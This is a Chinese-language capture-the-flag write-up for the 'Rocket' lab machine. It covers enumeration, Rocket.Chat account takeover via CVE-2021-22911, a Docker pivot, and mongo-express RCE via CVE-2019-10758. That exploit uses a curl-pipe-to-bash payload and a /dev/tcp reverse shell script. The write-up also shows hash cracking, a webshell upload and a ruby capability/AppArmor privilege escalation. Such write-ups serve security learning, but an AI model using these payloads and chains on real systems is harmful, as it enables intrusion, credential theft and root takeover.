Rocket

端口扫描

root@ip-10-10-64-224:~/rocket# nmap -sTCV -p- --min-rate 1000 10.10.190.108

Starting Nmap 7.60 ( https://nmap.org ) at 2023-12-02 01:19 GMT
Nmap scan report for ip-10-10-190-108.eu-west-1.compute.internal (10.10.190.108)
Host is up (0.0100s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b5:20:37:9f:99:b2:4f:23:ba:3a:43:60:b7:45:c8:62 (RSA)
|   256 12:77:83:03:1f:64:bb:40:5d:bf:2c:48:e2:5a:b5:18 (ECDSA)
|_  256 74:7c:e6:07:78:fc:fd:45:1d:e8:2b:d5:02:66:8e:cd (EdDSA)
80/tcp open  http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to http://rocket.thm
MAC Address: 02:02:7D:70:AC:51 (Unknown)
Service Info: Host: rocket.thm; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds

80

root@ip-10-10-64-224:~/rocket# curl -I http://rocket.thm/
HTTP/1.1 200 OK
Date: Sat, 02 Dec 2023 01:52:39 GMT
Server: Apache/2.4.29 (Ubuntu)
Cache-Control: max-age=0, must-revalidate, private
X-Powered-By: Bolt
Link: <http://rocket.thm/api/docs.jsonld>; rel="http://www.w3.org/ns/hydra/core#apiDocumentation"
Expires: Sat, 02 Dec 2023 01:52:40 GMT
Content-Type: text/html; charset=UTF-8

查看 HTTP 的 header X-Powered-By: Bolt 可以发现其为一个对应的 CMS 程序, 在其中查看时我们可以收集到对应的网站内部用户以及其邮箱

Kevin Boyle --> kevin --> [email protected]
Marcus Quigley --> marcus --> [email protected]
Laurent Povolski --> laurent--> [email protected]
Lucy Crooks --> lucy--> [email protected]

根据端口扫描的结构我发现其告诉我们指向了一个域名, 按照传统来说我喜欢先打子域, 首先进行子域的枚举

root@ip-10-10-64-224:~/rocket# ffuf -\w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u http://rocket.thm/ -H 'Host: FUZZ.rocket.thm' -fw 20

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1
________________________________________________

 :: Method           : GET
 :: URL              : http://rocket.thm/
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.rocket.thm
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response words: 20
________________________________________________

chat                    [Status: 200, Size: 224515, Words: 12566, Lines: 490]
:: Progress: [114532/114532] :: Job [1/1] :: 5127 req/sec :: Duration: [0:00:27] :: Errors: 0 ::

在这里我们可以看到目标存在一个子域 chat , 按照名称推测这应该是一个聊天系统, 之后进行访问, 我们可以看到这是一个聊天系统, 并且支持我们进行创建用户进行访问之后我创建用户访问其中, 发现一些内容:

• 存在几个用户 : admin、laurent、terrance
• 不存在其他利用的方式, 但是按照显示来看这是一个 CMS

经过搜索我发现了其是一个 Girhub 开源程 Rocket.Chat 接着经过搜索我发现了对应的漏洞利用 EXP Rocket.Chat-Automated-Account-Takeover-RCE-CVE-2021-22911 , 我查看对应的 EXP 后, 发现其需要一些条件

• 一个账户, 不存在 2FA
• 管理员邮箱 : 这个对应的我们没有, 在对 rocket.thm 信息收集时我收集到了对应网站的一个邮箱结构

后渗透

rocketchat (172.17.0.3)

执行我们得到的程序之后我们就可以得到一个 Shell

root@ip-10-10-141-243:~/rocket/CVE-2021-22911# python3 exploit.py  -u [email protected] -a [email protected] -H http://chat.rocket.thm/ --ip 10.10.141.243 --port 4444
[+] User: [email protected] exists
[+] Attempting to Authenticate With Provided Password
[-] Unable to Authenticate
[+] Commencing Account Takeover!
[+] Password Reset Email Sent
[+] Pulling Password Reset Token
[+] Reset Token: TPFfxF5xOaYMrnL6DO9wK7mWSDXDzFTJWdTDuWrC0Xc
[+] Password was changed to P@$$w0rd!1234
[+] NO 2FA DETECTED
[+] User: [email protected] exists
[+] Attempting to Authenticate With Provided Password
[-] Unable to Authenticate
[+] Commencing Account Takeover!
[+] Password Reset Email Sent
[+] Pulling Password Reset Token
[+] Reset Token: JgdjZNHvR2jIG--dpYZW2udwFSPnvfH2VGgFmvcA8PY
[+] Password was changed to P@$$w0rd!1234
[+] Succesfully authenticated as administrator
[+] Sending Reverse Shell Integration
[+] Shell for 10.10.141.243:4444 Has Executed!

经过一系列的信息收集, 我判断这是一个 DOCKER 环境, 并且系统中存在 Docker 环境, 在 Docker 中进行信息收集我获取到一些信息

1. 主机信息

   (remote) rocketchat@c2c82695ecf1:/app/bundle/programs/server$ hostname -I
   172.17.0.3 
   (remote) rocketchat@c2c82695ecf1:/app/bundle/programs/server$ cat /etc/hosts
   172.17.0.2	db f012d09a863c  # 从这里我们可以直到这是一个数据库
   172.17.0.3	c2c82695ecf1

2. 查看环境变量信息, 从这里我们可以直到 DB 位于 172.17.0.2:27017 , 有一个 MONGO 的 web 程序其对应端口为 8081

   (remote) rocketchat@c2c82695ecf1:/$ env
   Direct_Reply_Port=
   Direct_Reply_Frequency=5
   DB_PORT_27017_TCP_PORT=27017
   DB_ENV_MONGO_REPO=repo.mongodb.org
   DB_PORT_27017_TCP=tcp://172.17.0.2:27017
   DB_PORT=tcp://172.17.0.2:27017
   DB_PORT_27017_TCP_ADDR=172.17.0.2
   DB_ENV_MONGO_PACKAGE=mongodb-org
   MONGO_WEB_INTERFACE=172.17.0.4:8081
   DB_NAME=/rocketchat/db
   MONGO_OPLOG_URL=mongodb://db:27017/local
   Direct_Reply_IgnoreTLS=false

进行端口转发, 访问我们的数据库, 看看能不能获取到什么密码之类的内容

mongo (172.17.0.4:8081)

访问发现需要密码,. 之后经过搜索我发现了其默认的账号密码

使用得到的密码成功访问

接着经过搜索我发现一个 RCE 漏洞 CVE-2019-10758, 之后利用此来获取一个新的 Shell

root(172.17.0.4)

root@ip-10-10-141-243:~/rocket# cat reverse.sh 
#!/bin/bash
/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.141.243/4445 0>&1" 
root@ip-10-10-141-243:~/rocket# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.213.185 - - [03/Dec/2023 10:12:07] "GET /reverse.sh HTTP/1.1" 200 -

root@ip-10-10-141-243:~/rocket# proxychains curl http://172.17.0.4:8081/checkValid -H 'Authorization: Basic YWRtaW46cGFzcw==' --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://10.10.141.243:8000/reverse.sh | bash")'
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:8081-<><>-172.17.0.4:8081-<><>-OK

之后在其中进行搜索结果发现一个用户的密码哈希备份文件

bash-5.0# ls -al bson.hash
ls -al bson.hash
-rw-r--r--    1 root     root            70 Jun  1  2021 bson.hash
bash-5.0# cat bson.hash
cat bson.hash
Terrance:$2y$04$cPMSyJolnn5/p0X.B3DMIevZ9M.qiraQw.wY9rgf4DrFp0yLA5DHi

直接进行密码破解, 破解成功后, 我本来是想直接 SSH 登录但是没有成功, 现在可能需要返回主站做一些操作了

root@ip-10-10-141-243:~/rocket# john user.hash --wordlist=`locate rockyou.txt`
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 16 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1q2w3e4r5        (Terrance)
1g 0:00:00:18 DONE (2023-12-03 10:16) 0.05500g/s 2281p/s 2281c/s 2281C/s 200685..180893
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

访问我们的 Bolt 进行登录, 在这里我使用 admin:1q2w3e4r5 成功登录目标站点, 之后就是上传 webShell 一套操作

我们需要修改后台配置, 才可以上传 PHP 文件, 具体上传配置查看

alvin

之后访问我们上传的文件即可获取到 Shell, 同时这也是真实物理主机

alvin —> root

之后查看发现一个特殊的程序, 其具有特殊的功能 ruby#capabilities

(remote) alvin@rocket:/$ getcap -r / 2>/dev/null
/usr/bin/ruby2.5 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep

但是执行会发现无法利用, 对此询问 GPT 回答告诉我对应程序没有特权, 估计是做了限制

(remote) alvin@rocket:/$ /usr/bin/ruby2.5 -e 'Process::Sys.setuid(0); exec "/bin/sh"'
Traceback (most recent call last):
	1: from -e:1:in `<main>'
-e:1:in `setuid': Operation not permitted (Errno::EPERM)

经过相关了解后, 我意识到这里存在 apparmor 限制, 之后经过搜索发现对应的配置文件

(remote) alvin@rocket:/$ find / -type f 2>/dev/null | grep ruby
.....
/etc/apparmor.d/cache/usr.bin.ruby2.5
/etc/apparmor.d/usr.bin.ruby2.5
/etc/apparmor.d/abstractions/ruby
....
(remote) alvin@rocket:/$ cat /etc/apparmor.d/usr.bin.ruby2.5
# Last Modified: Mon Jun 14 23:01:44 2021
#include <tunables/global>

/usr/bin/ruby2.5 {
  #include <abstractions/base>

  capability setuid,

  deny owner /etc/nsswitch.conf r,
  deny /root/* rwx,
  deny /etc/shadow rwx,

  /etc/passwd r,
  /bin/cat mrix,
  /bin/cp mrix,
  /bin/ls mrix,
  /usr/bin/whoami mrix,
  /tmp/.X[0-9]*-lock rw,
  /lib/x86_64-linux-gnu/ld-*.so mr,
  /usr/bin/ruby2.5 mr,
  /usr/share/rubygems-integration/all/specifications/ r,
  /usr/share/rubygems-integration/all/specifications/did_you_mean-1.2.0.gemspec r,
  /{usr/,}lib{,32,64}/** mr,

}
(remote) alvin@rocket:/$

让 GPT 帮助我进行解读之后我了解了一些内容, 这里唯独只对 /tmp/.X[0-9]*-lock 做了额外的配置, 也许我们可以借此来进行利用

alvin@rocket:/tmp$ cp /bin/bash .X1-lock
alvin@rocket:/tmp$ chmod u+s .X1-lock 
alvin@rocket:/tmp$ /usr/bin/ruby2.5 -e 'Process::Sys.setuid(0); exec "cp --preserve=mode /tmp/.X1-lock /tmp/.X2-lock"'
alvin@rocket:/tmp$ ls -al .X2-lock 
-rwsr-xr-x 1 root alvin 1113504 Dec  3 10:58 .X2-lock
alvin@rocket:/tmp$ ./.X2-lock -p
.X2-lock-4.4# id
uid=1000(alvin) gid=1000(alvin) euid=0(root) groups=1000(alvin)